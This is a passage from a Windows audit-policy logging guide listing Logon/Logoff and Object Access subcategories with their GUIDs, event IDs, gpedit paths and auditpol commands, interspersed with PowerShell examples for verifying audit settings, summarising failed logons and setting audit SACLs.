You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-extended-mode)\n\n#### IPsec Main Mode\n\n- Subcategory GUID: `{0CCE9218-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4646\n  - 4650\n  - 4651\n  - 4652\n  - 4653\n  - 4655\n  - 4976\n  - 5049\n  - 5453\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Main Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-main-mode)\n\n#### IPsec Quick Mode\n\n- Subcategory GUID: `{0CCE9219-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4977\n  - 5451\n  - 5452\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Quick Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-quick-mode)\n\n#### Logoff\n\n- Subcategory GUID: `{0CCE9216-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4634\n  - 4647\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Logoff\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logoff)\n\n#### Logon\n\n- Subcategory GUID: `{0CCE9215-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on domain controllers or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4624\n  - 4625\n  - 4648\n  - 4675\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Logon\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
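The `gpedit.msc` path and the `auditpol` one-liners above set a subcategory, but neither tells you what is currently in effect, and running the commands blindly on a fleet is easy to get wrong. The PowerShell below is an added example (not part of the original page or of the Sigma project) that reads the effective setting of the Logon/Logoff subcategories listed in this guide, using the same GUIDs the `auditpol` commands use, and enables `Success and Failure` only where it is missing. It assumes an elevated session; `auditpol.exe` itself is built into Windows, and the GUID-to-name table is the only input.

```powershell
# Added example, not code from the original page: check the Logon/Logoff
# subcategories by GUID and enable Success + Failure where they are not set.
#Requires -RunAsAdministrator

# GUIDs as listed under Logon/Logoff in this guide; names are for output only.
$Subcategories = @{
    '{0CCE9215-69AE-11D9-BED3-505054503030}' = 'Logon'
    '{0CCE9216-69AE-11D9-BED3-505054503030}' = 'Logoff'
    '{0CCE9217-69AE-11D9-BED3-505054503030}' = 'Account Lockout'
    '{0CCE921B-69AE-11D9-BED3-505054503030}' = 'Special Logon'
    '{0CCE921C-69AE-11D9-BED3-505054503030}' = 'Other Logon/Logoff Events'
    '{0CCE9249-69AE-11D9-BED3-505054503030}' = 'Group Membership'
}

function Get-AuditSubcategoryState {
    param([Parameter(Mandatory)][string]$Guid)
    # "/r" makes auditpol emit CSV with the columns
    #   Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting
    # The output can start with a blank line, so drop empty lines before parsing.
    $rows = auditpol /get "/subcategory:$Guid" /r 2>&1 |
        Where-Object { $_ -match '\S' } |
        ConvertFrom-Csv
    if ($LASTEXITCODE -ne 0 -or -not $rows) { throw "auditpol /get failed for $Guid" }
    # One of: "No Auditing", "Success", "Failure", "Success and Failure"
    return $rows[0].'Inclusion Setting'
}

function Set-AuditSubcategory {
    param([Parameter(Mandatory)][string]$Guid)
    # Same auditpol /set invocation the page shows for each subcategory.
    auditpol /set "/subcategory:$Guid" /success:enable /failure:enable | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "auditpol /set failed for $Guid" }
}

$report = foreach ($guid in $Subcategories.Keys) {
    $before  = Get-AuditSubcategoryState -Guid $guid
    $changed = $false
    if ($before -ne 'Success and Failure') {
        Set-AuditSubcategory -Guid $guid
        $changed = $true
    }
    [pscustomobject]@{
        Subcategory = $Subcategories[$guid]
        Guid        = $guid
        Before      = $before
        After       = Get-AuditSubcategoryState -Guid $guid   # re-read to confirm the change took
        Changed     = $changed
    }
}

$report | Sort-Object Subcategory | Format-Table -AutoSize
```

Two caveats for domain-joined hosts: if a GPO defines any Advanced Audit Policy setting, the GPO is reapplied at the next Group Policy refresh and overwrites whatever `auditpol` set locally, so the durable place for the setting is the GPO; and the legacy category-level audit settings only lose to the subcategory settings when `Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings` is enabled. `auditpol /get /category:* /r` lists every subcategory with its GUID if you want to extend the table above.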
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logon)\n\n#### Network Policy Server\n\n- Subcategory GUID: `{0CCE9243-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High on servers that are running Network Policy Server (NPS).`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 6272\n  - 6273\n  - 6274\n  - 6275\n  - 6276\n  - 6277\n  - 6278\n  - 6279\n  - 6280\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Network Policy Server\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-network-policy-server)\n\n#### Other Logon/Logoff Events\n\n- Subcategory GUID: `{0CCE921C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4649\n  - 4778\n  - 4779\n  - 4800\n  - 4801\n  - 4802\n  - 4803\n  - 5378\n  - 5632\n  - 5633\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Other Logon/Logoff Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-logonlogoff-events)\n\n#### Special Logon\n\n- Subcategory GUID: `{0CCE921B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on domain controllers or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4964\n  - 4672\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Special Logon\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
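Once the Logon/Logoff subcategories are switched on, the next question is whether the event IDs listed for them are actually arriving in the `Security` channel. The PowerShell below is an added example (not from the original page) that queries the last 24 hours for every event ID this guide lists under Logon/Logoff, reports which IDs have not been seen at all, and then breaks down `4625` failures by target account and source address by pulling the named fields out of each event's `EventData`. It assumes an elevated session (or membership in `Event Log Readers`) and that the Security log's retention covers the window; some IDs, for example `4964` or `4675`, are legitimately rare, so "not seen" is a prompt to test, not proof of a misconfiguration.

```powershell
# Added example, not code from the original page: confirm that the Logon/Logoff
# event IDs listed in this guide are reaching the Security log, then summarise
# 4625 failures by account and source.

# Subcategory -> event IDs, taken from the Logon/Logoff sections above.
$Expected = @{
    'Logon'                     = 4624, 4625, 4648, 4675
    'Logoff'                    = 4634, 4647
    'Account Lockout'           = 4625
    'Special Logon'             = 4672, 4964
    'Group Membership'          = 4627
    'Other Logon/Logoff Events' = 4649, 4778, 4779, 4800, 4801, 4802, 4803, 5378, 5632, 5633
}
$Since = (Get-Date).AddHours(-24)

function Get-EventIdCoverage {
    param([hashtable]$Map, [datetime]$StartTime)
    # Flatten the per-subcategory arrays into one de-duplicated ID list and query once.
    $ids = $Map.Values | ForEach-Object { $_ } | Sort-Object -Unique
    # Get-WinEvent throws "No events were found" rather than returning nothing,
    # hence SilentlyContinue; an empty result is the interesting case here.
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = $ids; StartTime = $StartTime } `
                           -ErrorAction SilentlyContinue
    $counts = @{}
    foreach ($e in $events) { $counts[$e.Id] = 1 + [int]$counts[$e.Id] }
    foreach ($name in $Map.Keys) {
        foreach ($id in $Map[$name]) {
            [pscustomobject]@{
                Subcategory = $name
                EventId     = $id
                Count       = [int]$counts[$id]
                Seen        = [bool]$counts[$id]
            }
        }
    }
}

function Get-FailedLogonSummary {
    param([datetime]$StartTime, [int]$Top = 10)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $StartTime } `
                           -ErrorAction SilentlyContinue
    $rows = foreach ($e in $events) {
        # EventData is a list of <Data Name="...">value</Data> nodes; turn it into a lookup.
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TargetUser = $d['TargetUserName']
            Source     = $d['IpAddress']
            LogonType  = $d['LogonType']
            Status     = $d['Status']   # 0xC000006D bad user/password, 0xC0000234 account locked out
        }
    }
    $rows | Group-Object TargetUser, Source | Sort-Object Count -Descending |
        Select-Object -First $Top Count,
            @{ n = 'TargetUser'; e = { $_.Group[0].TargetUser } },
            @{ n = 'Source';     e = { $_.Group[0].Source } }
}

Get-EventIdCoverage -Map $Expected -StartTime $Since |
    Sort-Object Subcategory, EventId | Format-Table -AutoSize

Get-FailedLogonSummary -StartTime $Since | Format-Table -AutoSize
```

The same `Get-EventIdCoverage` call works for any other subcategory in this guide: swap the `$Expected` table for that section's event IDs. Because `Get-WinEvent -FilterHashtable` builds an XPath query behind the scenes, keep the `Id` list to a few dozen values per call; for very long lists, query per subcategory instead.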
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-special-logon)\n\n### Object Access\n\n#### Application Generated\n\n- Subcategory GUID: `{0CCE9222-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4665\n  - 4666\n  - 4667\n  - 4668\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Application Generated\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-generated)\n\n#### Certification Services\n\n- Subcategory GUID: `{0CCE9221-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to Medium on servers that provide AD CS role services`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4868\n  - 4869\n  - 4870\n  - 4871\n  - 4872\n  - 4873\n  - 4874\n  - 4875\n  - 4876\n  - 4877\n  - 4878\n  - 4879\n  - 4880\n  - 4881\n  - 4882\n  - 4883\n  - 4884\n  - 4885\n  - 4886\n  - 4887\n  - 4888\n  - 4889\n  - 4890\n  - 4891\n  - 4892\n  - 4893\n  - 4894\n  - 4895\n  - 4896\n  - 4897\n  - 4898\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Certification Services\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-certification-services)\n\n#### Detailed File Share\n\n- Subcategory GUID: `{0CCE9244-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `High on file servers.`\n  - `High on domain controllers because of SYSVOL network access required by Group Policy.`\n  - `Low on member servers and workstations.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5145\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Detailed File Share\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-file-share)\n\n#### File Share\n\n- Subcategory GUID: `{0CCE9224-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `High on file servers.`\n  - `High on domain controllers because of SYSVOL network access required by Group Policy.`\n  - `Low on member servers and workstations.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5140\n  - 5142\n  - 5143\n  - 5144\n  - 5168\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit File Share\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-share)\n\n#### File System\n\n- Subcategory GUID: `{0CCE921D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Varies, depending on how file system SACLs are configured`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4660\n  - 4663\n  - 4664\n  - 4670\n  - 4985\n  - 5051\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit File System\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system)\n\n#### Filtering Platform Connection\n\n- Subcategory GUID: `{0CCE9226-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5031\n  - 5150\n  - 5151\n  - 5154\n  - 5155\n  - 5156\n  - 5157\n  - 5158\n  - 5159\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Filtering Platform Connection\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection)\n\n#### Filtering Platform Packet Drop\n\n- Subcategory GUID: `{0CCE9225-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5152\n  - 5153\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Filtering Platform Packet Drop\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-packet-drop)\n\n#### Handle Manipulation\n\n- Subcategory GUID: `{0CCE9223-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4658\n  - 4690\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Handle Manipulation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-handle-manipulation)\n\n#### Kernel Object\n\n- Subcategory GUID: `{0CCE921F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4660\n  - 4663\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Kernel Object\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object)\n\n#### Other Object Access Events\n\n- Subcategory GUID: `{0CCE9227-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4671\n  - 4691\n  - 4698\n  - 4699\n  - 4700\n  - 4701\n  - 4702\n  - 5148\n  - 5149\n  - 5888\n  - 5889\n  - 5890\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Other Object Access Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events)\n\n#### Registry\n\n- Subcategory GUID: `{0CCE921E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to Medium, depending on how registry SACLs are configured.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4657\n  - 4658\n  - 4660\n  - 4663\n  - 4670\n  - 5039\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Registry\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
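The `Event Volume` notes for `File System` (above) and `Registry` ("depending on how ... SACLs are configured") make a point that is easy to miss: enabling either subcategory produces no `4663` or `4657` events on its own. Windows only audits an object whose SACL carries an audit ACE matching the access attempted, and SACLs are set per object, not by the audit policy. The PowerShell below is an added example (not from the original page) that places Success and Failure audit entries on a folder and on a registry key, then performs one write to each so you can watch the corresponding events appear. The paths `C:\SensitiveData` and `HKLM:\SOFTWARE\ExampleApp` are placeholders invented for this example; it assumes an elevated session (reading and writing a SACL needs `SeSecurityPrivilege`) and that `Audit File System` and `Audit Registry` have been enabled as shown in their sections.

```powershell
# Added example, not code from the original page: put audit ACEs (a SACL) on a
# folder and a registry key so that Audit File System / Audit Registry have
# something to report, then trigger one write against each.
#Requires -RunAsAdministrator

$FolderPath   = 'C:\SensitiveData'          # placeholder path for this example
$RegistryPath = 'HKLM:\SOFTWARE\ExampleApp'  # placeholder key for this example
$Principal    = 'Everyone'                   # audit every caller; narrow this in production

function Add-FileAuditRule {
    param([string]$Path, [string]$Identity)
    # Audit the accesses that change data or permissions; reads are deliberately
    # left out to keep 4663 volume manageable.
    $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAuditRule -ArgumentList @(
        $Identity,
        [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
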